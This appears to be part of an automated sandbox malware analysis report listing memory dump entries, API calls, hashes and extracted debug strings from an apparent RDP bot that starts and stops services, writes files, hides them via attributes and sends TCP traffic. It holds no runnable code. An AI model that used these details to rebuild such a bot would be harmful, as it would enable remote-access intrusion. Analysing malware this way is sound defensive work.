                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: Service$ErrorLast$CloseHandleOpenSleepStartfflushfwrite
                                                      • String ID: $(svc != NULL)$C:/Projects/rdp/bot/codebase/scm.c$P$[D] (%s) -> Service is already running(lpServiceName=%s)$[D] (%s) -> Service start requested(lpServiceName=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> OpenServiceA(SERVICE_START) failed(lpServiceName=%s,gle=%lu)$[E] (%s) -> Service start failed(lpServiceName=%s,err=%08x)$[E] (%s) -> StartServiceA failed(lpServiceName=%s,gle=%lu)$[I] (%s) -> Service started(lpServiceName=%s)$scm_start$~
                                                      • API String ID: 1000571331-2957688017
                                                      • Opcode ID: e977e50fa5ec83e665be764fc5ff6dc0635237359f1a02084f74bf6b16280fae
                                                      • Instruction ID: 602d451b7011398e294027a9a0118f82886cad205d019ab6896d7411d44568ca
                                                      • Opcode Fuzzy Hash: e977e50fa5ec83e665be764fc5ff6dc0635237359f1a02084f74bf6b16280fae
                                                      • Instruction Fuzzy Hash: 7C712159F0E55FA1FE6A5F1498B83B81260AF03F58F060832CA0E577D3DD1EAD858289
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: _errno$fwrite
                                                      • String ID: (mode != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,mode=%s,err=%08x)$[E] (%s) -> fopen failed(path=%s,mode=%s,errno=%d)$[E] (%s) -> fwrite failed(path=%s,mode=%s,errno=%d)$[I] (%s) -> Done(path=%s,mode=%s,buf_sz=%llu)$fs_file_write
                                                      • API String ID: 116495842-544371937
                                                      • Opcode ID: 0899e4bddf07ad0306c22b9e0b2a24751860f95e87bc8d5d9f86294b1d25de8d
                                                      • Instruction ID: 6c04adeceb0833d5c2fa64df5894c8ac71ff9819ba3e0f57a6257c9033456671
                                                      • Opcode Fuzzy Hash: 0899e4bddf07ad0306c22b9e0b2a24751860f95e87bc8d5d9f86294b1d25de8d
                                                      • Instruction Fuzzy Hash: 55516D69F0A64F81EE12AF14E9693B82661BF52F90F454532DA0D073D3EF3DE9068308
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: Heap$strncpy$Process_errno$AllocFreefflushfopenfseekfwrite
                                                      • String ID: (path != NULL)$5$C:/Projects/rdp/bot/codebase/ini.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(path=%s)$ini_load$mem_alloc
                                                      • API String ID: 1423203057-2746879330
                                                      • Opcode ID: 6ecf6371947af581774eebf3c09d8e48d851089462931acfdf1c98c03473eb14
                                                      • Instruction ID: da00a6cda28b2764e108a43f17b977698004153f860fdfd7a7c2252c037beb6e
                                                      • Opcode Fuzzy Hash: 6ecf6371947af581774eebf3c09d8e48d851089462931acfdf1c98c03473eb14
                                                      • Instruction Fuzzy Hash: 6DA1A26AB0E68A95EB138F04E4687B96790AB43F84F454831EB4D477C7EE2EE545C308
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: EnvironmentErrorExpandLastStringsfflushfwrite
                                                      • String ID: ((*xpath_sz) > 0)$(path != NULL)$(xpath != NULL)$(xpath_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> ExpandEnvironmentStringsA buffer is too small(path=%s,res=%lu,xpath_sz=%llu)$[E] (%s) -> ExpandEnvironmentStringsA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,xpath_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,xpath=%s,xpath_sz=%llu)$fs_path_expand
                                                      • API String ID: 1721699506-2819899730
                                                      • Opcode ID: 852bc3399429a0cfe269aba0471b5ee04fe5b0419ba2eb07b051e5bad8c194e6
                                                      • Instruction ID: 2f463ab28ca3a45b7516f369e8984d299ac87be201d511e13172f707dbbf3d7f
                                                      • Opcode Fuzzy Hash: 852bc3399429a0cfe269aba0471b5ee04fe5b0419ba2eb07b051e5bad8c194e6
                                                      • Instruction Fuzzy Hash: 21616A6AF0E50FD1FB229F94E8683B86655AF42B44F560532D60D073D3EE7DE9868308
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$Resource$FindLoadfflushfwrite
                                                      • String ID: (hnd != NULL)$(out != NULL)$C:/Projects/rdp/bot/codebase/module.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindResourceA failed(hnd=0x%p,gle=%lu)$[E] (%s) -> LoadResource failed(hnd=0x%p,gle=%lu)$[I] (%s) -> Done(hnd=0x%p,dwSignature=%08lx,dwStrucVersion=%08lx,dwFileVersionMS=%08lx,dwFileVersionLS=%08lx,dwProductVersionMS=%08lx,dwProductVersionLS=%08lx,dwFileFlagsMask=%08lx,dwFileFlags=%08lx,dwFileOS=%08lx,dwFileType=%08lx,dwFileSubtype=%08lx,dwFileDat$module_get_version
                                                      • API String ID: 2123903355-2019010457
                                                      • Opcode ID: 571ab3cfc749547104663c8428ec93bde6d77b031c2874d4d265202845669f56
                                                      • Instruction ID: ba41465b2829cbb7e745b242e66f1c8ec6bb5f825a7bf084df2ae01888d0b8fc
                                                      • Opcode Fuzzy Hash: 571ab3cfc749547104663c8428ec93bde6d77b031c2874d4d265202845669f56
                                                      • Instruction Fuzzy Hash: 0C417479B0A24A8BDB51CF28E46466977E0FB0AB64F400135EE5C8379AEF7CE540CB44
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: Heap$Processstrlen$AllocFree
                                                      • String ID: (buf != NULL)$(buf_sz != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Memory allocation failed(size=%llu)$ini_get_bytes$mem_alloc
                                                      • API String ID: 1318626975-3964590784
                                                      • Opcode ID: e7ddd0059b9cb393920fbdb9b1ee023d8d4bc45013e3b081370558f04b77c417
                                                      • Instruction ID: 7e73d363a18117eecd1d877dadbc0e34d34941491d33c361f16d3931cf24652f
                                                      • Opcode Fuzzy Hash: e7ddd0059b9cb393920fbdb9b1ee023d8d4bc45013e3b081370558f04b77c417
                                                      • Instruction Fuzzy Hash: DD315F69B0AA4F84FB12AF15A4383B522A0AF43F84F490431DA4E077D7EF3DE9458748
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: Service$ErrorLast$CloseHandleOpenQueryStatus
                                                      • String ID: (svc != NULL)$C:/Projects/rdp/bot/codebase/scm.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> OpenServiceA(SERVICE_QUERY_STATUS) failed(lpServiceName=%s,gle=%lu)$[E] (%s) -> QueryServiceStatusEx(SC_STATUS_PROCESS_INFO) failed(lpServiceName=%s,gle=%lu)$service_query_status
                                                      • API String ID: 1743273550-1326671558
                                                      • Opcode ID: 27ca208026315e5f24de18a0e699509c736c6ba9a65b60b29ef211bafcce92cf
                                                      • Instruction ID: e2fabb818167f36f149e13a689e43906d8360ea028a42b1b558f76a36206c949
                                                      • Opcode Fuzzy Hash: 27ca208026315e5f24de18a0e699509c736c6ba9a65b60b29ef211bafcce92cf
                                                      • Instruction Fuzzy Hash: 3D516D5AF1E52F81FA725E94A4683BC46465F03F55F160832DE4E273D3AE5FAC8042CA
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: AttributesFile$ErrorLast
                                                      • String ID: (attr != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,attr=%08lx,err=%08x)$[E] (%s) -> SetFileAttributesA failed(path=%s,gle=%lu)$fs_attr_set
                                                      • API String ID: 365566950-3085771803
                                                      • Opcode ID: 118d91c88687168bb50805d1646bdb282ccb7107512dfdb4efd46badff4f737d
                                                      • Instruction ID: c5a8b2e15decbb3ae6d3f722b700075fea256eca6a93a8f3e1484829dcc87361
                                                      • Opcode Fuzzy Hash: 118d91c88687168bb50805d1646bdb282ccb7107512dfdb4efd46badff4f737d
                                                      • Instruction Fuzzy Hash: AD517B7DF0E20F85FE239F50A5683796290AF02B84F145932DA1E867D7EF6DE8418709
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastObjectSingleWait
                                                      • String ID: $(pi != NULL)$C:/Projects/rdp/bot/codebase/process.c$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> WaitForSingleObject failed(pid=%lugle=%lu)$process_wait$~
                                                      • API String ID: 1211598281-4195011794
                                                      • Opcode ID: a91e3d988756e2a48877d66e165801d7a03b03c4b6efa01dd86f11ebe0b56f3f
                                                      • Instruction ID: 907bb14dfaeb9433ce4107e96f996b0f9273dfc46e22b25ff252ef4da275ed02
                                                      • Opcode Fuzzy Hash: a91e3d988756e2a48877d66e165801d7a03b03c4b6efa01dd86f11ebe0b56f3f
                                                      • Instruction Fuzzy Hash: 0F310A2CF0F20F96FA624F94A4A87BD12549F06B09E240933C74E467D7AD9EA885C259
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: Virtual$ErrorLastProtectQuery
                                                      • String ID: Unknown pseudo relocation protocol version %d.$ VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                                      • API String ID: 637304234-2693646698
                                                      • Opcode ID: ea52c8d6c1307b8a334d5e44ba4476aadd38c7b73436a73b6dc99475cb645e3c
                                                      • Instruction ID: 96d96c0fe6ba5ec2ffeb996128bd04c7949ebdca0f2d222c00d46a17ddbb6a7e
                                                      • Opcode Fuzzy Hash: ea52c8d6c1307b8a334d5e44ba4476aadd38c7b73436a73b6dc99475cb645e3c
                                                      • Instruction Fuzzy Hash: C131B129B07A0A86EE02CF51E86976963E0EB8AF80F458135DD0D07376EE3CE585C748
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastsend
                                                      • String ID: [E] (%s) -> !!!WTF!!!(sock=0x%llx,l=%d,n=%d)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> send failed(sock=0x%llx,WSAgle=%d)$tcp_recv$tcp_send
                                                      • API String ID: 1802528911-690514478
                                                      • Opcode ID: 4696e067596304e8daf50865a739a9a4465fd7ef701951fddedde6edb7a6f13d
                                                      • Instruction ID: 3c948485d77f0a8b77e203186ed6234bd7d92da2735f1e5add6335e7f5713a80
                                                      • Opcode Fuzzy Hash: 4696e067596304e8daf50865a739a9a4465fd7ef701951fddedde6edb7a6f13d
                                                      • Instruction Fuzzy Hash: D521B369B0A54F42EA224F25A9687B452417F0BFB0F980730DE2C477D3FE1EA5458349
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: Heap$Free$Process$Library
                                                      • String ID: %d.%d.%d.%d$[I] (%s) -> Supported library version(ver_s=%s)$[W] (%s) -> Unsupported library version(ver_s=%s)$check_version$termsrv32.ini
                                                      • API String ID: 3459754157-3683084121
                                                      • Opcode ID: c23690aed3ba96d1316742d7162e3a5219ff59d77c763922ba17b8b98f5d4f1d
                                                      • Instruction ID: 76e0d097029b61dcd161d393b74683618955d114690591506079e26c7a512616
                                                      • Opcode Fuzzy Hash: c23690aed3ba96d1316742d7162e3a5219ff59d77c763922ba17b8b98f5d4f1d
                                                      • Instruction Fuzzy Hash: C3315E69B0A58F91EB629F21A8683BA6360FF82B80F441431EB4D46796EE3DD545C708
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: Service$CloseControlErrorHandleLastOpen
                                                      • String ID: [E] (%s) -> ControlService(SERVICE_CONTROL_STOP) failed(lpServiceName=%s,gle=%lu)$scm_stop
                                                      • API String ID: 3311966420-638458398
                                                      • Opcode ID: 9d32a450d9529e4f7208059fe122acd65ec6d0a44146d9feb9c1b3c48191f629
                                                      • Instruction ID: 33a9f9283e07f922861d50b40c5f8e7e79f4cf13a956ea2dadcb6beb658e8062
                                                      • Opcode Fuzzy Hash: 9d32a450d9529e4f7208059fe122acd65ec6d0a44146d9feb9c1b3c48191f629
                                                      • Instruction Fuzzy Hash: AC016169B0AA0F61FE1A5F05E46837513A0BF07F45F054835CA0D43397EE3EE4448308
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: Service$CloseControlErrorHandleLastOpen
                                                      • String ID: [E] (%s) -> ControlService(SERVICE_CONTROL_STOP) failed(lpServiceName=%s,gle=%lu)$scm_stop
                                                      • API String ID: 3311966420-638458398
                                                      • Opcode ID: 5ae8186eb9aced61c16335e4d497b36d5146403487a7827606e0941bde00189c
                                                      • Instruction ID: 8bde0b7423d58acdfc6be473f454fced9467307711ef6301d0333a903b615549
                                                      • Opcode Fuzzy Hash: 5ae8186eb9aced61c16335e4d497b36d5146403487a7827606e0941bde00189c
                                                      • Instruction Fuzzy Hash: 35016169B0AA0F61EE1A5F05E4A837613A0BF07F45F054835CA0D47397EE3EE4048308
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: Service$CloseControlErrorHandleLastOpen
                                                      • String ID: [E] (%s) -> ControlService(SERVICE_CONTROL_STOP) failed(lpServiceName=%s,gle=%lu)$scm_stop
                                                      • API String ID: 3311966420-638458398
                                                      • Opcode ID: 6980429015bf69b343a53b2273b3575ebf9ddc442d678d9aff60eac1e2079f65
                                                      • Instruction ID: 81a24b1d22856c52847398b7973349a4f57774c365054549fcf2cf25fbfe7844
                                                      • Opcode Fuzzy Hash: 6980429015bf69b343a53b2273b3575ebf9ddc442d678d9aff60eac1e2079f65
                                                      • Instruction Fuzzy Hash: 25015E69B0AA0B61FA1A5F05E46837513A0BF07F45F054835CA0D42397EE3EE4448308
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: Service$CloseControlErrorHandleLastOpen
                                                      • String ID: [E] (%s) -> ControlService(SERVICE_CONTROL_STOP) failed(lpServiceName=%s,gle=%lu)$scm_stop
                                                      • API String ID: 3311966420-638458398
                                                      • Opcode ID: 9d32a450d9529e4f7208059fe122acd65ec6d0a44146d9feb9c1b3c48191f629
                                                      • Instruction ID: 33a9f9283e07f922861d50b40c5f8e7e79f4cf13a956ea2dadcb6beb658e8062
                                                      • Opcode Fuzzy Hash: 9d32a450d9529e4f7208059fe122acd65ec6d0a44146d9feb9c1b3c48191f629
                                                      • Instruction Fuzzy Hash: AC016169B0AA0F61FE1A5F05E46837513A0BF07F45F054835CA0D43397EE3EE4448308
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
